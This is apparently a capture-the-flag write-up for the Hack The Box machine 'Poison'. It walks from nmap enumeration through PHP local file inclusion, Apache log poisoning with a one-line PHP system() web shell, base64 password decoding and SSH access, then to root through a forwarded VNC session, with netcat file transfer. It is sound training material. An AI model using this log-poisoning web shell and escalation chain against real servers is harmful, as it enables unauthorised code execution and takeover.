Enum

nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Visit port 80 and we land on a page which is used to inlucde local php files. Sounds like we could perhaps get Get RCE via LFI

Since this is FreeBSD the access logs are not located in /var/log/auth.log instead they are located in /var/log/httpd-access.log.

They could also be located in

/var/log/apache/access.log 
/var/log/apache2/access.log
var/log/httpd/access.log

Now lets poison the logs

nc 10.10.10.84 80
GET /<?php system($_GET['cmd']);?>
HTTP/1.1 400 Bad Request
Date: Wed, 24 Mar 2021 15:10:20 GMT
Server: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>

Doing some commands via cmd in Burp reveals that there is a pwdbackup.txt.

The backup is an encoded password which has been base64 encoded 13 times.

After decoding all the layers, the password is ?Charix!2#4%6&8(0

From including /etc/passwd we are able to see that there is a user called charix.

Using these creds gives via ssh us access to the box.

In charix home directory there is secret.zip. We scp over that to our box scp charix@10.10.10.84:/home/charix/secret.zip secret.zip

Using the password from charix lets us unzip the archive.

The contents of secret -> [|Ֆz!.

Looking at unusual processes running as root, one stands our

ps -auxw

[...]
root     529   0.0  0.7  23620 7496 v0- I    Wed15      0:00.06 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120
[...]

Looking at listening ports

charix@Poison:~ % netstat -an | grep LIST
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

5801 and 5901 stands out.

We portforward these to our box ssh -L 6901:127.0.0.1:5901 -L 6801:127.0.0.1:5801 charix@10.10.10.84

Now that we have forwarded the ports. We can authenticate using the secret file.

vncviewer -passwd secret 127.0.0.1:6901

Having trouble getting the root.txt from the vnc session to my local box so i transfer it via nc.

nc -nvlp 9001 > root.txt
listening on [any] 9001 ...
connect to [10.10.16.65] from (UNKNOWN) [10.10.10.84] 61534